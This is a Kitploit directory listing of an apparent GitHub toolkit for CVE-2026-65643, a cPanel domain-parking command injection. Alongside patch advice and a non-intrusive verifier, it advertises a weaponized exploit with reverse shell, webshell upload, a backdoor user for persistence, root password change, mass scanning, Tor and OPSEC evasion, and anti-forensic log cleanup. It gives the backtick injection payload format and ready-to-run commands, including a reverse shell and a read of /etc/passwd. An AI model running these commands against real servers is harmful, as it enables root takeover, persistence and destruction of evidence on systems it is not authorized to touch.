Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-65643-PoC-Toolkit — Red/Blue team toolkit for CVE-2026-65643, a cPanel domain parking RCE. Includes exploit with reverse shell, webshell, persistence, and mass scanning, plus a non-intrusive verifier for detection and auditing. | Kitploit
Ferramentas/GitHubGitHub/tc4dy/cve-2026-65643-poc-toolkit
Privilege EscalationVulnerability ScannersPersistence MechanismsExploitationWeb Application ExploitationPost-ExploitationPenetration TestingCommand and Control

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Red Teaming
Payload Development
GitHubtc4dy/cve-2026-65643-poc-toolkit

CVE-2026-65643-PoC-Toolkit

Red/Blue team toolkit for CVE-2026-65643, a cPanel domain parking RCE. Includes exploit with reverse shell, webshell, persistence, and mass scanning, plus a non-intrusive verifier for detection and auditing.

Ver Repositório
12416há 20 diasAinda não revisado
Conteúdo não disponível no idioma solicitado. Mostrando versão em inglês.

CVEPoC

CVE‑2026‑65643 – cPanel Domain Parking RCE Toolkit

Python 3.8+ CVSS Author cPanel

⚠️ ETHICAL USE ONLY – AUTHORIZED SECURITY TESTING
This repository provides tools for authorized security professionals, blue teams, and penetration testers only.
Unauthorized access to computer systems is illegal under CFAA (US), Computer Misuse Act (UK), TCK 243/244 (Turkey), and similar laws worldwide.


📖 Vulnerability Overview

CVE‑2026‑65643 is a critical command injection vulnerability in cPanel & WHM versions 11.x that allows an authenticated cPanel user to execute arbitrary system commands with root privileges via the domain parking functionality.

How it works

  1. Authenticated access required – the attacker must have a valid cPanel account (username/password) on the target server.
  2. Domain parking injection – when adding a parked domain, the domain name is not properly sanitized, allowing the attacker to inject shell commands using backticks (`).
  3. Command execution – the injected command is executed by the system with the privileges of the cPanel user, which can be escalated to root via privilege escalation techniques.
  4. Root privileges – because the domain parking operation runs with sufficient permissions, arbitrary commands can be executed with high privileges.
  5. Impact – full server compromise, data theft, backdoors, ransomware, and lateral movement. Upgrade immediately!

Affected Versions

  • cPanel & WHM 11.110.0.140 and earlier – vulnerable
  • 11.134.0.52 and earlier – vulnerable
  • 11.136.0.36 and earlier – vulnerable
  • 11.138.0.1 and earlier – vulnerable
  • 11.138.1.6 and later – patched

Patch

  • Upgrade to cPanel & WHM 11.138.1.6, 11.138.0.2, 11.136.0.37, 11.134.0.53, or 11.110.0.141 or newer.
  • If upgrade is not possible, disable domain parking permissions for cPanel users as a temporary workaround.

🧰 Tools

ToolPurposeIntended User
exploit.pyFull weaponized toolkit with reverse shell, webshell, persistence, file read/write, root password change, mass scanning, Tor support, and OPSEC features.Red teams / authorized pentesters

📊 Feature Comparison


🎯 Use Case Summary


⚙️ Installation

root@kitploit:~
git clone https://github.com/tc4dy/CVE-2026-65643-PoC-Toolkit
cd CVE-2026-65643-PoC-Toolkit
pip install -r requirements.txt

requirements.txt

root@kitploit:~
requests
urllib3

📋 Parameters

exploit.py Parameters

verifier.py Parameters


💥 Scenarios


🧪 Endpoint & Injection Methods

The exploit uses the following cPanel endpoints and injection methods:

Payload Format

root@kitploit:~
# Injection payload format
test.com`<command>`

# Example
test.com`id`
test.com`whoami`
test.com`echo 'pwned' > /tmp/pwned`

🛡️ Responsible Use

  • Only use these tools on systems you own or have explicit written permission to test.
  • Unauthorized access is illegal and unethical.
  • The authors are not responsible for any misuse.
  • Always follow your country's laws and regulations.

This software is provided for educational purposes and authorized security testing only.

Baixar ferramenta
verifier.pyNon‑intrusive vulnerability checker that detects cPanel version, validates injection, and assesses risk without executing any malicious payload. Generates detailed reports.Blue teams / security auditors
Featureexploit.pyverifier.py
Vulnerability detection✅✅
Version detection (4 endpoints)✅✅
Command injection✅❌
Reverse shell✅❌
WebShell upload✅❌
Persistence (cPanel user creation)✅❌
Root password change✅❌
File read/write✅❌
4 injection methods (JSON/Form/CGI/API2)✅✅
Tor support (anonymity)✅❌
User‑Agent rotation (OPSEC)✅❌
Jitter (OPSEC)✅❌
Mass scanning (multi‑thread)✅❌
Interactive shell✅❌
Non‑intrusive (safe) mode❌✅
Timeline logging✅✅
HTML report✅❌
JSON report✅✅
Log cleanup (anti‑forensic)✅✅
Proxy support✅✅
Custom User‑Agent✅✅
SSL verification control✅✅
ScenarioRecommended Tool
Blue Team – verifying if your cPanel installation is vulnerableverifier.py
Security Audit – non‑intrusive vulnerability assessmentverifier.py
Red Team – authorized penetration testing with full exploitationexploit.py
Bug Bounty – responsible disclosure testingverifier.py
Mass Scanning – checking multiple targets for vulnerabilityexploit.py (detection only)
Incident Response – checking if systems are compromisedverifier.py
ParameterDescription
-t, --targetTarget cPanel URL (e.g. https://cpanel.example.com:2083)
-l, --target-fileFile containing list of targets (one per line) for mass scanning
-u, --usernamecPanel username
-P, --passwordcPanel password
-p, --portOverride cPanel port (default from URL or 2083)
--threadsNumber of threads for multi‑target (default: 10)
-o, --outputSave JSON report to file
--html-reportSave HTML report to file
-v, --verboseVerbose output
--proxyHTTP/HTTPS proxy (e.g. http://127.0.0.1:8080)
--torRoute through Tor (localhost:9050)
-ua, --user-agentCustom User‑Agent
--no-keep-aliveDo not keep session alive
--delayDelay between requests (default: 2.0s)
--jitterRandom jitter (0‑1 sec) between requests (default: 0.5)
--max-retriesMax retries (default: 5)
--ssl-verifyVerify SSL certificates
--timeoutRequest timeout (default: 15s)
--cmdExecute a single command on the target
--reverse-shellReverse shell IP:PORT
--passwdChange root password
--adduserCreate cPanel user (USER DOMAIN PASSWORD)
--readRead a file
--writeWrite a file (specify path)
--write-contentContent to write
--cleanupClean logs and history after exploitation
-i, --interactiveInteractive shell after exploitation
--domain-suffixSuffix for parked domain (default: exploit.local)
ParameterDescription
-t, --targetTarget cPanel URL (e.g. https://cpanel.example.com:2083)
-u, --usernamecPanel username
-P, --passwordcPanel password
-o, --outputSave JSON report to file
-v, --verboseVerbose output
--proxyHTTP/HTTPS proxy (e.g. http://127.0.0.1:8080)
--torRoute through Tor (localhost:9050)
--ssl-verifyVerify SSL certificates
--timeoutRequest timeout (default: 15s)
--cleanupClean logs after test
#ScenarioCommand
1Quick vulnerability checkpython verifier.py -t https://cpanel.example.com:2083 -u user -P pass
2Detailed scan with reportpython verifier.py -t https://cpanel.example.com:2083 -u user -P pass -o report.json -v
3Reverse shellpython exploit.py -t https://cpanel.example.com:2083 -u user -P pass --reverse-shell 192.168.1.100:4444
4Execute commandpython exploit.py -t https://cpanel.example.com:2083 -u user -P pass --cmd "whoami"
5Read sensitive filepython exploit.py -t https://cpanel.example.com:2083 -u user -P pass --read /etc/passwd
6Change root passwordpython exploit.py -t https://cpanel.example.com:2083 -u user -P pass --passwd NewRootPass123
7Create new cPanel user (persistence)python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --adduser backdoor domain.com Parola123
8Interactive shell after exploitationpython exploit.py -t https://cpanel.example.com:2083 -u user -P pass -i
9Mass scanning from filepython exploit.py -l targets.txt -u user -P pass --threads 20 -o results.json
10Use proxy, Tor, and custom User‑Agentpython exploit.py -t https://cpanel.example.com:2083 -u user -P pass --proxy http://127.0.0.1:8080 --tor -ua "Mozilla/5.0"
11Clean logs after exploitationpython exploit.py -t https://cpanel.example.com:2083 -u user -P pass --cleanup
MethodEndpointDescription
JSON API/cpsessXXXXX/json-api/domainPrimary injection method via JSON payload
Form Data/cpsessXXXXX/json-api/domainAlternative injection via form-encoded data
CGI Script/cgi-sys/domainpark.cgiLegacy CGI endpoint injection
API2/cpsessXXXXX/json-api/cpanelLegacy API2 injection method